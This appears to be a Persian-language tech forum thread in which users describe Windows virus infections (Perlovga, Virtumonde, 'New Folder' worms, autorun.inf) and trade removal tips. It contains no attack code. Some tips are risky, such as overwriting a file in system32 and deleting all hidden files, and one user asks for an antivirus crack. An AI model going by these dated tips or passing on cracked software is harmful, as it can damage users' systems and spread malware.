که شماyes را میزنید ٬ اکنون همین کار را برای درایوهای دیگرتان نیز انجام دهید با این تفاوت که برای هر درایوی نام آن درایو را در جلوی دستور open نوشته و سپس آنرا در درایو مورد نظر ذخیره کنید.( مثلآ برای درایو d دستورopen بصورت
open d:\ خواهد بود و ... )

تا اینجا توانستیم aoutorun درایوهارو به حالت قبلی برگردونیم ،حالا برای رهایی از دست پیامی که مربوط به temp2.exe هست و در هنگام بالا اومدن ویندوز با اون مواجه میشیم بصورت زیر عمل میکنیم:


یک آیکن appelication را از یه جای کامپیوترتون پیدا کرده و اونو به temp2 تغییر نام بدین ( شکل این آیکن شبیه خود آیکن temp2 هستش )وسپس در مسیر c:\windows\system32 کپیش کنید حالا پیام مربوط به جایگزینی رو تایید کنید و روی همین آیکن جدیدتون راست کلیک کرده و در قسمت properties خاصیت Read Only اونو تیک دارش کنید ، اکنون به امید درست شدن کامپیوترتون یه ریستارت بکنیدش ، امید وارم که موثر بوده باشه؛ اگه براتون مشکلی پیش اومد همینجا مطرحش کنید؛
از شما آقای mashhadkhafan به خاطر مطرح کردن یه راه حل دیگه خیلی ممنونم.

سلام
همتون مثل من باشید .
سریع ویندوز عوض کنید حل میشه .

خب اينو كه ميشه با Msconfig حل كرد

سلام دوست عزيز من الان دارم عكس هاش رو آپ مي كنم
بعت مي گم چجوري خلاص شي

اينم قولي كه داده بودم حاضر شد

--------------------------------------------------------------------------------------------------------------
خوب در ابتدا در اين قسمت در گزينه run كلمه ي msconfig رو وارد مي كنيم .
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
حالا در اين قسمت گزينه startup رو مي زنيم
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
بعد توي اين ليستيكي ظاهر شده برنامه مورد نظر رو پيدا كنيد مثلا مي گيد اسمش kernel.exe هست تيكشو برداريد
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
بعد ok كنيد و سيستم رو دوباره راه اندازي كنيد اميدوارم مشكلتون حل بشه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

منتقل شد......

--------------------------------------------------------------------------------

دوستان سلام
آقا جدیدا روی سیستم من در taskbar کنار آیکون ساعت یک آیکون آمده که critical system error است و هنگامی که روی آن کلیک می کنی یک صفحه جدید باز می کنه و یک آنتی ویروس رو پیشنهاد می کنه که استفاده کنم ....
می شود من را راهنمایی کنید چطوری این آیکون ر ا حذف کنم ....
ممنون

--------------------------------------------------------------------------------

دوستان سلام
آقا جدیدا روی سیستم من در taskbar کنار آیکون ساعت یک آیکون آمده که critical system error است و هنگامی که روی آن کلیک می کنی یک صفحه جدید باز می کنه و یک آنتی ویروس رو پیشنهاد می کنه که استفاده کنم ....
می شود من را راهنمایی کنید چطوری این آیکون ر ا حذف کنم ....
ممنون

سیستم شما به Adware و یا احتمالا تروجان آلوده شده. چون شما رو به دانلود کردن یه چیز دیگه هدایت میکنه.

برای رفع این مشکل شما این برنامه زیر رو که حجمش هم همچین زیاد نیست دانلود کنید.

a-squared Free 2.1


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

بعد که دانلود کردید اون رو نصب کنید و بعد از نصب برنامه حتما اون رو آپدیت کنید. زمانی که برنامه رو باز میکنید فقط کافیه

که روی Update Now کلیک کنید. بعد از اینکه آپدیت تموم شد به قسمت Scan PC در سمت چپ برنامه برید و در اونجا

قسمت Deep Scan رو انتخاب کنید و در نهایت بر روی Scan کلیک کنید.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بعد از پیدا کردن فایل های آلوده انتخاب هایی رو برای پاک کردن اونها بهتون میده هر کردوم رو که بهتر میدونید

انتخاب کنید و اون فایل های آلوده رو از روی سیستمتون پاک کنید.

سلام من به نمی دونم چی آلوده شده که هر وقت وارد یک فولدر می شم اون فولدر ناپدید می شه البته فکر کنم به خاطر آنتی ویروس کسپر باشه که می شناستش ولی نمی تونه کاری بکنه اینو هم بگم وقتی با با کسپر همون درایوی که فولدر توش بوده و ناپدید شده رو اسکن می کنم فولدر رو نشو ن می ده که داره اونو اسکن می کنه
ولی به صورت معمولی دیده نمی شه حالا چه کنیم

کامپیوتر من این error می دهدcopy.exe teemp2.exe هر چقدر که هم کامپیوتر efdisk کردم پاک نشده

با اف ديسك همه جك و جونورها پاك ميشه...شايد برنامه هاي كه بعد اف ديسك ميريزي ويروسي باشه...
سي دي بوت ايبلت سالمه؟ شايد اون ويروسي باشه...
پيشنهاد من اينه كه...اگه هاردت مكستوره با مكس بلست4 يه كوئك فرمت بكن بعدش با همون برنامه پارتيشن بندي بكن...بعدشم با يه سي دي ديگه ويندوز نصب كن...ويندوزم به صورت خام امتهان كن...يه چند روزي برنامه هاي جانبي رو نصب نكن...

عزيزم چرا اين قد خودتو اذيت ميكني اين فايل autorun رو ويروس داخل هر درايو اضافه ميكنه كه درايواتو auto play كنه...
فايلها رو از hidden در بيارين تيك hide protected رو هم بردارين...بعدش داخل درايوا برين و فايلاي autorun ويروس رو دليت كنين...البته قبلش بايد ويروس ناكار شده باشه...از توي استارت اپ...و task maneger ....
`

به نظر من بهترين راه براي اينكه خيال ادم راحت شه...اينكه ويندوز عوض كنين....بعدش سريع برين فايلا رو ازhidden در بيارين...تيك hide protected رو هم بردارين بعد با خيال راحت فايلاي ويروسي داخل درايو ها رو دليت كنين....بعدشم با نود32 اپديت شده يه اسكن بكنين و خيالتون رو راحت كنين...غير از درايو ويندوز همه فايلهاي هيدن رو به غير از RECYCLER و System Volume Information پاگ كنين...

سلام
یک سری svchost.exe ناشناس رو سیستم من ((به خاطر غفلت من)) نصب شدن که موقع Startup اجرا میشن و سرعت اجرای ویندوز را پایین میارن.هر چقدر هم از توی رجیستری پاکشون میکنم بالافاصله ساخته میشن.
registry gurd کسپراسکای هم نتونسته کاری کنه.
الان Realtime Scan رو بردم روی High و CPU در معرض انفجار قرار داره.
یه اسکن کامل هم انجام دادم و دوتا شون پاک شدن از system32.
حالا نمیدونم مشکل Startup رو چطوری حل کنم.اینا زودتر از Kaspersky اجرا میشن.

ایا میشود فایل های که به ویروس win32.nemsi.b
الوده شدن را بازیابی کرد و از انها استفاد کرد
اگر میشود چگونه وبا کدام برنامه

راستشو بگم خودمم نمیدونم چی شده ولی یه همچین مشخصاتی داره

توی هر فلدری میرم خود به خود توش یه نیو فلدر میسازه بعدش اون فلدر وقتی لیستش میکنم میره ته لیست

هرچی آنتی ویروس گذاشتم کار نکرد

اون نیو فلدرا هم قابل پاک کردن نیستن و با اجرای اون My Documents باز میشه

بعد از وصل شدن به اینترنت نمیشه صفحه ایی رو باز کرد

راستی این اواخر برادرم یه mp3 player دست دوم گرفته بود فکر کنم زیر سر همینه

یه کمک اسیدی به من بکنید ثواب داره جای دوری نمیره

شرمنده که اینجا مطرح کردم نمدونم جاش همینجا بود یا نه

راستشو بگم خودمم نمیدونم چی شده ولی یه همچین مشخصاتی داره

توی هر فلدری میرم خود به خود توش یه نیو فلدر میسازه بعدش اون فلدر وقتی لیستش میکنم میره ته لیست


با آنتی ویروس NOD32 مشکلت حل میشه. بعدش فکر کنم بایدSEARCH کنی توی کامپیوتر هرچی New Folder بود پاک کن

راستشو بگم خودمم نمیدونم چی شده ولی یه همچین مشخصاتی داره

توی هر فلدری میرم خود به خود توش یه نیو فلدر میسازه بعدش اون فلدر وقتی لیستش میکنم میره ته لیست

هرچی آنتی ویروس گذاشتم کار نکرد

اون نیو فلدرا هم قابل پاک کردن نیستن و با اجرای اون My Documents باز میشه

بعد از وصل شدن به اینترنت نمیشه صفحه ایی رو باز کرد

راستی این اواخر برادرم یه mp3 player دست دوم گرفته بود فکر کنم زیر سر همینه

یه کمک اسیدی به من بکنید ثواب داره جای دوری نمیره

شرمنده که اینجا مطرح کردم نمدونم جاش همینجا بود یا نه

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

در ضمن یادم رفت بگویم تقریبا تمامی آنتی ویروسهای مشهور آن را شناسایی می کنند.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام
یک سری svchost.exe ناشناس رو سیستم من ((به خاطر غفلت من)) نصب شدن که موقع Startup اجرا میشن و سرعت اجرای ویندوز را پایین میارن.هر چقدر هم از توی رجیستری پاکشون میکنم بالافاصله ساخته میشن.
registry gurd کسپراسکای هم نتونسته کاری کنه.
الان Realtime Scan رو بردم روی High و CPU در معرض انفجار قرار داره.
یه اسکن کامل هم انجام دادم و دوتا شون پاک شدن از system32.
حالا نمیدونم مشکل Startup رو چطوری حل کنم.اینا زودتر از Kaspersky اجرا میشن.

سلام دوست عزیز

خود ویندوز هم تعدادی سرویس دارد که معمولا خودشان را با نام svchost.exe در TaskManager نشان می دهند و وجود چند فایل با این نام همیشه به معنی آلوده شدن به ویروس نیست ( مثلا هم اکنون در ویندوز ویستایی که من اجرا می کنم حدود 12 پروسه با این نام وجود دارد )ولی این فایلها نباید در لیست Startup و یا Services های پنجره System Configuration دیده شود نمی دانم آیا از این پنجره استفاده کرده ای یا نه ولی یکبار سیستمت را با کاسپرسکی در حالت Safe Mode اسکن کن اگر درست نشد بگو تا راه حل دیگری بگویم.

ایا میشود فایل های که به ویروس win32.nemsi.b
الوده شدن را بازیابی کرد و از انها استفاد کرد
اگر میشود چگونه وبا کدام برنامه

کسی نیست جواب بده

سلام
آقا سيستم من يه ويروس گرفته كه همه چيزو هيدن ميكنه
براي پاك كردنش چكار كنم
مرسي

سلام
آقا سيستم من يه ويروس گرفته كه همه چيزو هيدن ميكنه
براي پاك كردنش چكار كنم
مرسي

منتقل شد........

اگه با آنتی ویروس نمی شه مشخصه دیگه ویندوز رو باید عوض کنید.

دست همگی درد نکنه بلاخره از شرش راحت شدم البته با kaspersky خودمونیم عجب چیزیه کارش درسته بغیر از این ویروسه کلی تروجان و از این خرتوپرتا پیدا کردش تازه بعضی از فایلامو از دست دادم ولی می ارزید

ولی یه مشکلی باقی مونده اونم اینکه درایوام آتوراندار شدن یعنی با دبل کلیک می خوات یه آتورانی رو اجرا کنه که پیداش نمیکنه (به حق چیزای ندیده)
چکارش باید بکنم که بازم فقط با یه دبل کلیک برم تو درایوام

اگه جواب بدین خوشحالم میکنید

vtn54 شرمندتم من اولش یه سرچ کوچولو کرده بودم ولی متوجه اون تاپیک نشدم همین شد که اینجا سوالمو مطرح کردم

ولی یه مشکلی باقی مونده اونم اینکه درایوام آتوراندار شدن یعنی با دبل کلیک می خوات یه آتورانی رو اجرا کنه که پیداش نمیکنه (به حق چیزای ندیده)
چکارش باید بکنم که بازم فقط با یه دبل کلیک برم تو درایوام

اگه جواب بدین خوشحالم میکنید



سلام دوست عزیز

در پانل کنترل گزینه Folder Option را باز کن در پنجره Folder Option مطابق شکل زیر تیک گزینه

Hide Protected Operating System Files را بردار .حالا هر کدام از درایوهایت را که باز کنی یک فایل به اسم autorun.inf

توی آن پیدا می کنی همه آنها را پاک کن ولی با فایلها و پوشه های دیگر کاری نداشته باش حالا دوباره تیک گزینه مربوطه را بگذار انشا... مشکلت حل می شود.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

در ضمن من پیشنهاد می کنم سیستمت را با یک آنتی اسپایور قوی و آپدیت شده اسکن بکنی.

موفق باشی.

يك ويروسي هست چند وقتي آمده دوستم اين ويروس را گرفته بايد چكار كند
ويروسه كارش اينه كه به فايلهاي exe اجازه نصب نمي دهد؟

سلام به همه :
چند روز ه که یک ویروس اومده تو pc نمیدونم چیه ولی اینجوری که اولا کل my document رو نابود کرد همه جا هم یک new folder باز می کنه windows رو هم عوض کردم ولی باز هم نرفته کسی می تونه کمک کنه در ضمن هیچ antivirusi هم کار نمی کنه حتی باز نمیشه تا بتونه کار کنه یا اگه بخوام از اینترنت انتی ویروس بگیرم pc ریستارت میشه لطفا کمکم کنید وعضم عجیب خرابه........:puke: :puke:



مرسی وقتی صفحات قبل رو خوندم فهمیدم سوالم بی مورد بود ببخشید

يك ويروسي هست چند وقتي آمده دوستم اين ويروس را گرفته بايد چكار كند
ويروسه كارش اينه كه به فايلهاي exe اجازه نصب نمي دهد؟

سلام Lord_theOne عزیز

اطلاعات دیگری از این ویروس نداری چون خیلی از کرمها و ویروسها پس از آلوده کردن سیستم جلوی نصب و باز شدن

فایلهای exe را می گیرند اگر اطلاعات دیگری داشته باشی کمک بیشتری می توان کرد .با اینحال اگر دوستتان به اینترنت

دسترسی دارد از سرویس نانواسکن پاندا استفاده کند :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

این چند دقیقه بیشتر وقت او را نمی گیرد ولی لااقل نام ویروس مربوطه را فاش می کند اگر اسکن مربوطه ویروسی را

گزارش کرد نام آن را در این تاپیک گزارش کنید شاید بشود کاری کرد.

با سلام
من یه جور ویروس گرفتم که هروقت میخوام هر درایوی را باز کنم پیام خطا میده و دو فایل به اسم TEMP1 و Temp2 اجرا میشن و فلاپی داریو همینجوری کار میکنه . درایوها هم به طور صفحه دیگه باز میشن
انتی ویروس من کاسپراسکی6 است و آپدیتش کرد اما بازم حل نشد
TEMP1 و Temp2 داخل پوشه سیستم32 میرن

با سلام
من یه جور ویروس گرفتم که هروقت میخوام هر درایوی را باز کنم پیام خطا میده و دو فایل به اسم TEMP1 و Temp2 اجرا میشن و فلاپی داریو همینجوری کار میکنه . درایوها هم به طور صفحه دیگه باز میشن
انتی ویروس من کاسپراسکی6 است و آپدیتش کرد اما بازم حل نشد
TEMP1 و Temp2 داخل پوشه سیستم32 میرن

سلام دوست عزیز

کاسپرسکی این ویروس را با نام Virus.Win32.Perlovga.a شناسایی می کند ولی به طر کامل آن را پاک نمی کند شما

باید چند کار را همزمان انجام بدهی تا سیستمت به طور کامل پاک شود:

اول System Restore را غیرفعال کن بعد به حالت Safe Mode برو حالا Registery Editor را باز کن و به ترتیب کلمات

copy.exe و host.exe را جستجو کن و هر کلیدی را که پیدا کردی پاک کن .حالا در پانل کنترل گزینه Folder Option

را باز کن در پنجره Folder Option مطابق شکل زیر تیک گزینه Hide Protected Operating System Files را بردار .حالا

هر کدام از درایوهایت را که باز کنی یک فایل به اسم autorun.inf توی آن پیدا می کنی همه آنها را پاک کن ولی با

فایلها و پوشه های دیگر کاری نداشته باش حالا دوباره تیک گزینه مربوطه را بگذار

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

حالا با کاسپرسکی در هما ن حالت Safe Mode سیستم را اسکن کن .اگر مشکلت با این کارها حل نشد بگو تا چاره

دیگری بکنیم.

دوستان کامپیوتر من یه ویروس گرفته که باعث شده فونت های اکسپلورر خیلی بزرگ بشده وبهم ریخته

کسی میدونه این چه ویروسی هست و با چی پیدا میشه

در ضمن ار کاسپر و مکافی استفاده کردم ولی نتیجه نداده

vtn54
ممنون که راهنماییم کردی
دستت درد نکنه

دوست عزیز سیستمتو یکبار با انتی ویروس پاندا ویک بار هم به کاسپر اسکن کن 99% مشکلت حل میشه ...من تجربه کردم البته باید انتی ویروست به روز باشه در غیر این صورت باید ویندوز عوض کنی....

به نام خدا
سلام دوستان
امروز که Nod 32 آپدیت شد شروع کرد به گیر دادن به همه ی فایل های HTML و PHP و ...
و نمیتونه اون فایل ها رو Clean کنه و فقط Delete که منم نمیتونم Delete شون کنم چون لارم دارمشون
آیا راهی داره که بشه این ویروس رو Clean کنم ؟
اینم یک عکس ار Nod 32
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
ممنون میشم کمک کنید

کسی نیست به من کمک کنه ؟ !

با سلام
دوستان این دو تا ویروس منو خیلی اذیت میکنه به فاصله 1 دقیقه صفحه وب باز میکنه و سرعت خیلی پایین میاد
برتامه های nod 32 و spy hun ter2.8 را هم دارم nod پیدا میکنه ولی نمیتونه پاک کنه بعضا هم پاک میکنه ولی دوبهره سبز میشه
c:\windows\system32\awvts.dll - probably a variant of Win32/Adware.Virtumonde.O application
c:\windows\system32\vtuuvtt.dll - Win32/Adware.Virtumonde application
متشکر

با antispyware avg7.5 پاک شد

سلام برهمه
نیاز به آنتی ویروسی دارم که بتونه ویروس new folder کاملا از بین ببره چون این ویروس نمیذاره هیچ آنتی ویروسی اجرا بشه

سلام برهمه
نیاز به آنتی ویروسی دارم که بتونه ویروس new folder کاملا از بین ببره چون این ویروس نمیذاره هیچ آنتی ویروسی اجرا بشه

سلام دوست عزیز
یه سرچ میزدی بد نبود.
اینجا کارت راه میوفته:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

با سلام
قسمتی از taskbar که برنامه های اجرا شده در ان لیست می شوند ، پاک شده است
انتی ویروس نورتن 2007 و اپدیت به تاریخ امروز ویروسی را شنا سایی نکرده است
اگر این ویروس را می شناسید نام انرا و
اگر کلید رجیستری برای Enable کردن این قسمت از taskbar را میدانید
لطفا مرا راهنمایی کنید؟

با سلام
ايا desktop.ini ويروسه يا نه؟
اگه ويروسه با جه انتي ويروسي از بين ميره؟

سلام
یه مشکل برای پوشه های هاردم پیش اومده . بعضی از فولدرهای من آخرش پسوند .exe پیدا شده.و خود به خود هیدن شدن و از حالت هیدن هم خارج نمی شه.در ضمن پوشه ها رو هم به سایز 37 کیلو نشون می ده.
لطفا کمک کنین.:sad:

عزيزم اينا كه شما مي فرمايي ويروس هست!
يه KasperSky يا AVG كه نصب كني مشكلت رو رفع ميكنن.

سلام
کاملا درسته اسم ویروس هم وین 32 هست.

تروجان ه از نود استفاده کنید

سلام خدمت همه ی اساتید

والا من یه چند روزی متوجه 100% بودن سی پی یو م شده بودم . هرکاری هم میکردم رفع نمیشد ، جز با Restart .
که دوباره بعد از بالا اومدن ، یه مدت که میگذشت دوباره کامپیوتر کند میشد و میدیدم بله .... 100% شده .

والا الان که کسپر رو گذاشتم که موقع بالا اومدن ، استارت آپ رو چک کنه ، نشونش داد که میخواد فعالیت کنه ...
ازم پرسید Terminate or Allow .... منم ترمینیت زدم .
اما من قصدم حذف کردنشه . اما کسپر به عنوان یه ویروس نمیشناسدش . چون گذاشتم کل هاردو بگرده ، اما چیزی پیدا نکرد ، جز دو تا Crack برنامه .

بعضی اوقات هم ( الان شده اکثر اوقات ) 7 IE رو که باز میکنم و میبندم ، میمونه توی Processes و کامپیوتر رو کند میکنه . بعضی وقتا هم بدون اینکه اصلا IE رو باز کرده باشم ، به Processes اضافه میشه .
واسه Firefox هم همین اتفاق میفته . یعنی باقی موندن توی Processes .

با Ad-Aware SE هم Scan کردم . اما بازم از بین نبردش .

خیلی ممنون میشم اگه کمکم کنید .

پیشاپیش از توجهتون ممنونم .

یا حق

با تشکر
ازراهنمایی هاتون.

دوست عزيز من هم همين مشكل رو داشتم

اين يه ويروسه كه بالاخره بعد از كلي دردسر AVG پاكش كرد

ولي تا يه مدت هر وقت بالا ميومد مي خواست netcmd.exe رو اجرا كنه و بعد مي گفت پيداش نمي كنم

حالا شما اول Run رو باز كن بعد بنويس Regedit و ok كن و برو به اين آدرس

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

بعد روي Shell دابل كليك كن و اونجا هر هيچيز غير از Explorer.exe نوشته رو پاك كن

حالا اگه تو پروسسات netcmd.exe هست ببند اگه نشد restart كن ديگه نمي ياد

حالا برو و فايل netcmd.exe رو از توي system32 ( يا خوده فولدر ويندوز) پاك كن

البته اين روش كاملا شايد اين ويروس رو از بين نبره

با سلام
چند روزه پیش Language bar روی ویندوز دیده نمیشد.با هر زحمتی بود آوردمش ولی باز رفته وبه هیچ وجه دیده نمیشه.البته میتونم با alt+shift زبان رو عوض کنم.

سلام
خودت Language bar رو مخفی کردی یا خودش شده اگه خودش میشه بله احتمالا ویروس و احتماله بیشتر اسپایور هست
دلیله دیگشم اینه که یکی میره سره pc انگولکش میکنه چون گفتی درستش کردی باز اینجوری میشه

نه خودش اینجوری شده حالا چیکار باس بکنم؟

سلام
منونم دوست عزیز
خیلی لطف کردی .

توی این آدرسی که از Registry دادی هم بود . پاکش کردم از اونجا .
توی فولدر Startup هم بود ، که حذفش کردم .

اما خوشبختانه همونطور که گفتم ، Kasper اجازه نداده بود که بره توی پروسس .
ایشالا که مشکل حل بشه .

اما یه سوال داشتم که تو پست قبلیم یادم رفت بپرسم .
میخواستم بدونم این ویروس چجوری وارد کامپیوترم شده .
منکه هیچ سایت خطرناکی نمیرم . پس چجوری اومده که حتی OutPost هم حالیش نشده ؟
و اینکه اگه واقعا یه ویروسه ، چرا کسپر به عنوان ویروس نمیشناسدش ؟

ممنونم دوست عزیز

قربانت

یا حق

والا اين كه چطور وارد سيستم شده رو نمي دونم

من با AVG Internet Security هم اينو داشتم

حتي يكي از دوستام با NOD32 و Kerio Firewall هم اينو گرفته بود

ولي چرا كاسپر نگرفته خوب اون هم مثل بقيه

من مدتهاست كه كاسپر رو كنار گذاشتم چون واقعا برام قابل اعتماد نبود

من از Kaspersky Internet Security 6.0 استفاده مي كردم و مرتب هم آپديت مي شد

ولي بعد از يه مدت تو فولدر System تو دايركتوري اصلي ويندوز چند تا فايل EXE پيدا كردم

كه آقاي كاسپر مي گفت ويروس نيست ولي تو ويندوز ديگم كه خيلي هم كم سراغش ميرم

NOD32 داشتم كه اون هم نسبتا آپديت مي شد و NOD مي گفت همون فايل ها ويروسه

و پاكشون مي كرد و دوباره تو اين ويندوز بعد از يه مدت براحتي بر ميگشتند و كاسپر صداش در نميومد

البته من قبل از اين كه كاسپر قضيه Black List رو راه بندازه اونو كنار گذاشتم و با اين كارش ديگه

هيچ وقت سراغش نمي رم

شاید اپدیت کردی اینجوری شده
حالا میگی زبان عوض میشه پس مشکلی نیست حالا خوده Language bar نباشه عیبی نداره!

سلام دوست من
از توضیحات کاملت واقعا ممنونم

کاملا هم باهات موافقم . هیچ آنتی ویروسی قابل اعتماد نیست .
من قبلا از NOD استفاده میکردم . ولی یه مدتی که تعریف کسپر رو شنیدم ، اومدم طرف کسپر .

پس فکر میکنم الان بهتره NOD رو هم نصب کنم . نه ؟
کار که از محکم کاری عیب نمیکنه :)
خوبیه NOD هم به اینه که فضای کمی از Ram رو اشغال میکنه .

شما خودت الان فقط از NOD استفاده میکنی ؟
Firewall ت چیه ؟


دوست عزیز . بازم از راهنماییت ممنونم .

قربانت

یا حق

دوست عزيز همون طور كه گفتم من الان دو تا ويندوز دارم

SP1 و SP2 كه اوليش ويندوز اصليمه و دوميش رو بيشتر به خاطر كارهاي درسي و مخصوصا

اجراي كدهاي سنگين جاوا و همين طور تست برنامه هاي جديدي كه فقط روي SP2 نصب ميشه نصب كردم

روي ويندوز اصليم در حاله حاضر 7.5 AVG Internet Security دارم كه شامل آنتي ويروس آنتي اسپايور

فايروال و آنتي اسپمه و نرم افزار امنيتي ديگه اي ندارم

روي Sp2 همون طور كه گفتم بيشتر براي تست برنامه هاست و الان Bitdefender Internet Security 10 به طور فعال

و Avast pro 4.7 به صورت غير فعال نصبه كه هيچ كدوم اين دو تا راضيم نكرده ولي AVG رو واقعا قبول دارم و

هميشه با دوستم كه نود داره براي هم ويروس مي فرستيم و تقريبا تمامش توسط هم نود و هم AVG شناخته ميشه

من خودم مي خوام يه آنتي ويروس جديد رو تست كنم كه تو خيلي از مقايسه ها رتبه خوبي داشته

G Data Antivirus Kit فقط مشكلش اينه كه روي SP2 بايد نصب شه

حالا شما مختاري كه هر كدوم از اين آنتي ويروسهايي كه گفتم رو انتخاب كني ولي در كل من NOD32 رو بيشتر

از Kaspersky قبول درام

دوست من ، از توجهت خیلی ممنونم .

من AVG رو تا حالا به طور جدی امتحان نکرده بودم .
البته چیز خاصی هم در موردش نشنیده بودم ، جز الان و حرفهای شما .
ولی از Avast خاطره بدی دارم . باعث شد یه ویندوز نو رو عوض کنم . فکر میکنم خیلی زیاد هم از حافظه رو اشغال میکنه .

دوست عزیز واقعا از راهنماییهات ممنونم .
NOD رو هم تصمیم گرفتم نصب کنم .

قربانت

یا حق

سلام دوست عزیز

فکر نمی کنم از ویروس باشد مشکل از تنظیمات ویندوز شما است.

سلام
من یه فایله کرک برا winrar گرفتم از crackdb.com میخوام بدونم ویروسی یا نه خودم با کاسپر چک کردم ولی چیزی نشون نداد کسی اینجا norton یا mcafee داره یه تست کنه اپلود کردم فایلشو
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام

تو یکی از این دو سایت چک کن :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ممنون
ویروسی نبود

باید فایلهاتو ادیت کنی به روش سنتی(دستی) تا پاک نشن

یا میتونی به PDF تبدیلشون کنی و اگر به فایل PDF گیر نداد میتونی فایل های اصلی رو پاک کنی.

ویرایش کردن راحت تره

سلام

من کامپوترم یه ویروس گرفت که یک فابل exe با آیکن فولدر به نام New Folderدرست می کرد . این ویروس قسمتایی از کامپوترم مثل Task Manager , Run , Folder Options,HomePage رو غیر فعال کرده .
به هر زور و زحمتی بود ویروسو غیر فعال کردم و اونو از بین بردم . اما هنوز اون خرابکاریهاش از بین نرفته ... می خواستم بدونم این ویروس دیگه چه قسمت هایی از ویندوز رو از کار انداخته ؟

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام
لطفا هرکه میدونه من رو راهنمایی کنه من یه خدمات موبایل دارم که آهنگ گذاری وبرنامه ریزی موبایل انجام میدم
دیروز یه مموری رو گذاشتم روی کامپیوتر که ویروسی بود که ازاون به بعد بعضی فولدرها داخل داریوها مخفی شدن اونم از نوع سیستمی
که حتی نمیشه اونا رو از مخفی درآورد واز هر فایل که کپی می سازه که با پسوند اجرایی تا حالا بیش از ده تا انتی ویروس نصب کردم مثل کاسپر-بیت دی فندر-مک آفی -پاندا2007-زون آلارم که
بعضی شون ویروسارو مشناسن بعضی شون هم نه ویندوزرو هم از اول نصب کردم ولی درست نشد که نشد
در ضمن ویندوزم رو هم هر وقت که نصب میکنم وقتی که میخواد ویندوز بالا بیاد شروع به اسکن میکنه تا آخر هم میره ولی سری بعد هم همین آش و همین کاسه
من که میگم که این ویروس یا کرم یاتروجان یا هر چیز دیگه تو یه درایوی دیگه هست که هر وقت ویندوز رو هم نصب می کنم دوباره شروع به فعالیت میکنه خلاصه هر کاری
که بلد بودم رو انجام دادم تورو خدا هرکی میدونه منو راهنمایی کنه:2: :13:

کسی نیست مارو راهنمایی کنه

سلام دوست عزیز

با این اطلاعاتی که شما گذاشتید راهنمایی کردن کمی مشکل است ولی هیچ ویروسی از فورمت جان سالم به در

نمی برد بهتر است از اطلاعات ضروریتان یک کپی تهیه کنید و کل هارد را فورمت کرده و بعد ویندوز را مجددا نصب کنید.

ممنون از جوابتون
من تا حد ممکن نمی خوام که هاردمو fdisk کنم
الان من آنتی ویروس avastرو نصب کردم که فایل های copy.exeو host.exeرو که مخفی بودن رو به عنوان تروجان با نامWin32:Small-BTX [Trj]وwin32:perlovgaرومیشناسه و پاک می کنه اما بعضی از فولدرها همچنان مخفی هستش که یه کپی از اونو رو به نامexe.*میسازه که اگه پاکشون کنی باز هم میان vtnجان حالا میگید چه کار کنم
راستی اگر کرک avast رو هم بزاری ممنون می شم

زحمت نکشید من هاردمو fdisk کردم

حیف اف دیسک کردی! آنتی ویروس NOD32 2.7 و ZoneAlram Internet Security Suite این کارو انجام میدن! من خودم دقیقا همین ویروس رو داشتم که با زون آلارم پاکش کردم. ولی هیچی NOD32 نمیشه.

سلام
به خدا گریه ام گرفته از دست این ویروس
توی هرفولدری می رم و میام بیرون اونو پاک می کنه ، مخصوصا عکس
حتی فایلهای بزرگ رو هم ولی وقلی کاسپر سکی سرچ می کنه فایلهای بزرگتر هست ولی هدن هم نیست
حجم هر فولدری را 37.5 نشان میده ، کاسپر سکی آپدیت شده نتونست اونو پیدا کنه ، ند 32 هم فقط فایل
servise exe را در system 32 نشان کرده و اونو پاک کرد ، ویندوز عوض کردم باز هم این عوضی پیدا شد
بعضی دوستان گفتند باید پچ این ویروسو پیدا کنی بعد با اون می تونی از بین ببری و بعد می تونی دیتا بیس های
اونو از بین ببری ، ولی من اینا رو بلد نیستم.
حالا وقتی سیستم بالا میاد اروری میده و میگه توی temp فایل servise exe رو پیدا نمی کنم ، نمیدونم چه
ربطی به servise exe ی که در system 32 بود داره .
فولدرهای My Documents را هم هدن شده نشون میده .

اساتید لصفا بگید:

این ویروس چیه

فایلهایی رو که پاک کرده کجاست و چه طوری میاد

با چی میتونم از شر اون خلاص شم

تا حالا کسی با این ویروس برخورد کرده

چه نرم افزارهایی احتیاج دارم

سلام
به خدا گریه ام گرفته از دست این ویروس
توی هرفولدری می رم و میام بیرون اونو پاک می کنه ، مخصوصا عکس
حتی فایلهای بزرگ رو هم ولی وقتی کاسپر سکی سرچ می کنه فایلهای بزرگتر هست ولی هدن هم نیست
حجم هر فولدری را 37.5 نشان میده ، کاسپر سکی آپدیت شده نتونست اونو پیدا کنه ، ند 32 هم فقط فایل
servise exe را در system 32 نشان کرده و اونو پاک کرد ، ویندوز عوض کردم باز هم این عوضی پیدا شد
بعضی دوستان گفتند باید پچ این ویروسو پیدا کنی بعد با اون می تونی از بین ببری و بعد می تونی دیتا بیس های
اونو از بین ببری ، ولی من اینا رو بلد نیستم.
حالا وقتی سیستم بالا میاد اروری میده و میگه توی temp فایل servise exe رو پیدا نمی کنم ، نمیدونم چه
ربطی به servise exe ی که در system 32 بود داره .
